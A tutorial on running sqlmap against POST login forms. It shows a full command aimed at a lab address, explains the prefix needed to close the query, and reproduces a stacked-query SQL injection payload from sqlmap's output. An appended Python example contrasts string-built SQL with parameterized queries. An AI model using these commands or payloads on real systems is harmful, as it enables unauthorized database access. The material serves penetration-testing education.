SQLmap and POSTs, rather than GETs
Hi guys, what's going on? Hacking on charm? :D
Well, writing something cool here: a tutorial on sqlmap and POST requests, since most tutorials only tell you about GETs. Sounds interesting? Well, it is.
So, the options you'll want to use:
-u URL, --url=URL <-- Target url
--method=METHOD <-- HTTP method, GET or POST (default GET)
--data=DATA <-- Data string to be sent through POST
-p TESTPARAMETER <-- Testable parameter(s)
--prefix=PREFIX <-- Injection payload prefix string
--postfix=POSTFIX <-- Injection payload postfix string
--dbms=DBMS <-- Force back-end DBMS to this value
* --dbms= helps if sqlmap is not working; it sometimes irritates. :)
Let's assume that we have a simple POST request.
3ncrypt0r@bt:~/pentest/sqlmap-dev$ python sqlmap.py -u "http://192.168.1.100/upgoingstar/login.aspx" --method POST --data "usernameTxt=blah&passwordTxt=blah&submitBtn=Log+On" -p "usernameTxt" --prefix="')" --dbms=mssql -v 2
--method to pass the POST option
--data to pass the parameters that are required for the POST
-p to pass the injectable field, so in this case the username field (usernameTxt)
--prefix to pass what needs to come before the injected payload. Here we had to issue a tick ( ' ) and a right parenthesis ( ) ) to close out the query
--dbms to tell it the back end was mssql
This yields sqlmap output like so:
Place: POST
Parameter: usernameTxt
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: usernameTxt=blah'); WAITFOR DELAY '0:0:5';-- AND ('yTwo'='yTwo&passwordTxt=blah&submitBtn=Log+On
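Why the ') prefix matters, and the fix, as an added example (not code from the original post). It assumes a hypothetical lookup query that opens a parenthesis around the username test, uses SQLite as a stand-in for MSSQL, and the names TEMPLATE, build_unsafe, split_statements, login_safe and demo_db are made up here.

```python
import sqlite3

# Hypothetical login lookup; the page does not show the application's SQL.
# The opening parenthesis is assumed because the page's --prefix is ').
TEMPLATE = "SELECT id FROM users WHERE (username = '{u}')"
# usernameTxt value copied from the Payload line in the sqlmap output above.
PAGE_PAYLOAD = "blah'); WAITFOR DELAY '0:0:5';-- AND ('yTwo'='yTwo"

def build_unsafe(username):
    """Vulnerable pattern: user input is pasted into the SQL text."""
    return TEMPLATE.format(u=username)

def split_statements(sql):
    """Split on top-level ';', honouring '...' literals and -- comments."""
    out, cur, in_str, i = [], [], False, 0
    while i < len(sql):
        if not in_str and sql.startswith("--", i):
            end = sql.find("\n", i)          # comment runs to end of line
            i = len(sql) if end == -1 else end
            continue
        ch = sql[i]
        if ch == "'":
            if in_str and sql[i + 1:i + 2] == "'":   # '' is an escaped quote
                cur.append("''")
                i += 2
                continue
            in_str = not in_str
        if ch == ";" and not in_str:
            out.append("".join(cur).strip())
            cur = []
        else:
            cur.append(ch)
        i += 1
    out.append("".join(cur).strip())
    return [s for s in out if s]

def login_safe(conn, username):
    """Hardened pattern: the value is bound, so the SQL text never changes."""
    sql = "SELECT id FROM users WHERE (username = ?)"
    row = conn.execute(sql, (username,)).fetchone()
    return row[0] if row else None

def demo_db():
    """Constructed in-memory table standing in for the real back end."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'alice')")
    return conn
```

With string building, the page's payload turns one statement into two; with a bound parameter the same value is only compared as a literal username and matches nothing.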
Well, this is it. Try it once and you would enjoy it. :)
Have fun.